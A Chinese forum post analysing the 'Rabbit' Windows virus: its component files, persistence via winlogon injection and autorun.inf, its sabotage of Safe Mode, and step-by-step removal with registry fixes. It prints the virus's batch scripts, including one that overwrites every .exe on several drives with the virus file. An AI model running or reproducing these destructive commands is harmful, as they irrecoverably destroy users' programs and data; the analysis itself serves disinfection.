|
工作模式:
兔子的几个文件之间存在明显的分工合作关系:
当病毒原文件Rabbit.exe被执行后,会在system32下释放出loveRabbit.exe、jk.exe和love.bat,并执行loveRabbit.exe和love.bat
先看看下面love.bat的内容吧,列出defgh分区和program files的exe文件的列表c:\windows\下的msconfig.inf和msconfig1.inf,并用两个for命令调用copy命令把列表中的exe文件全部用Rabbit.exe替换掉!需要知道这个行为比熊猫和硬盘杀手还有恨,这样丢失的数据基本上是找不回来的!
[Copy to clipboard]CODE:
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
其中loveRabbit.exe是比较关键的一个进程,这个病毒的大部分工作是由它做的,它负责在system32下生成msexch400.dll并插入winlogon.exe进程;不断生成loveRabbit.bat和DEFG分区根目录下面的autorun.inf文件,并执行不断loveRabbit.bat;
删除注册表项HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}和HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318},不断添加注册表项HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath;而且它还能关闭icesword和sreng等安全软件;它还能对安全模式的键值作出检查,如被修复了它立刻删除相关键值;
另外一个批处理就是被loveRabbit.exe不断执行的loveRabbit.bat,作用是不断的将病毒文件设置系统和隐藏属性;
[Copy to clipboard]CODE:
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
而被插入msexch400.dll模块的winlogon.exe的线程数会不断上升,干扰正常的关机和注销,并在loveRabbit.exe被结束时由winlogon.exe重新启动;
至于jk.exe的工作就简单多了,它运行后会检查loverabbit.exe是否被关闭,如关闭了就重新运行它,之后便退出,是用于系统启动时激活病毒的进程;
还有就是在各个分区下面的autorun.inf和rabbit.exe,用于双击进入分区时重新激活病毒;
明显的分工,编写者的思路很清晰,启动用的jk.exe、主要工作进程loverabbit.exe、插入模块msexch400.dll和两个bat文件等,各有各做的事情,合作起来使得运行后病毒很难会被结束掉。
清理办法:
由于它的进程守护太好了,要关闭它实在不容易,而且安全模式被破坏了,就只有另外想办法了……
方法一:这个病毒有个疏忽的地方,就是jk.exe不能靠loverabbit.exe进行修复,而这个是系统启动是激活病毒用的,这就给了我们一个机会了;首先到system32文件夹下面删除jk.exe,不过病毒把系统大部分的exe文件都替换了,所有启动项里面一定要先进行清空然后才重启,由于病毒控制了winlogon.exe进程导致不能正常重启,所以我们就用不经过winlogon.exe的重启方式吧,打开任务管理器,然后按着ctrl再选择任务管理器的关机菜单里面的重启,这样就重启成功了,重启完成后正式清理;
方法二(推荐):映象劫持,最近学回来的东西,嘻嘻;注册表文件的内容如下,将其导入注册表并结束loverabbit.exe进程之后就可以正式清理了;
[Copy to clipboard]CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loverabbit.exe]
"Debugger"="dikex.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rabbit.exe]
"Debugger"="dikex.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\jk.exe]
"Debugger"="dikex.exe"
正式清理:首先到文件夹选项把所有隐藏文件都显示出来,之后删除下面的文件,其中msexch400.dll需要重启或者使用unlocker等工具删除:
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
各个分区根目录下面的rabbit.exe和autorun.inf文件
在我的电脑里面搜索*.exe,把变了兔子图标的文件全部删除(他们无法挽救的了,节哀吧……)
最后删除注册表HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\下面的{4bf41072-b2b1-21c1-b5c1-0305f4155515},导入下面注册表信息:
[Copy to clipboard]CODE:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}]
@="DiskDrive"
原文地址:http://bbs.janmeng.com/viewthread.php?tid=564433&extra=page%3D1
原文标题:【04-09】兔子病毒的分工工作模式和清理方法
作者: dikex @2dai.com
图片来自:阳光的个人空间,by:清新阳光
|
